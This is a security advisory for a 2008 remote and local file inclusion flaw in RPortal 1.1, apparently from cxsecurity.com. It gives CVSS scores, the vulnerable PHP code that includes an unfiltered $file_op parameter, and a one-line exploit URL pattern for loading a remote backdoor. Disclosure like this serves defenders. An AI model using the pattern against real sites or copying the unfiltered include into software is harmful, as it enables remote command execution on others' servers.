Remote and Local File Inclusion Vulnerability <= 1.1 Rportal

2008.10.02
Risk: High
Local: No
Remote: Yes


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

######################################################### # # RPortal v1.1 # # # Rportal is a management system of contents simple and powerful Web, # enabling you to create your site in a few minutes, while profiting # from a complete and effective administration. # # # Remote and Local File Inclusion Vulnerability <= 1.1 # Found the 29th September 2008 ########################################################## # Author: Kad # # mail : kadfrox [ a ] gmail [ dot ] com # ########################################################## # # script : RPortal v 1.1 # http://www.rportal.org/?op=download&fid=36 # ########################################################## [~] Exploit : http://www.site.com/index.php?file_op=[url] # # Vulnerable code source : # if(!isset($file_op))$file_op=''; if($file_op!="") { $op_basepath = trim(strrev(strstr(strrev($file_op),"/php/"))); if($op_basepath!='') $op_basepath = str_replace("/php/", "/", $op_basepath); include($file_op); } # The problem is that the variable $file_op is not filtered # Then, you can put the link that you want, like your own backdoor # and execute commands.

References:

http://www.securityfocus.com/bid/31523
http://www.securityfocus.com/archive/1/archive/1/496891/100/0/threaded
http://www.milw0rm.com/exploits/6648


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top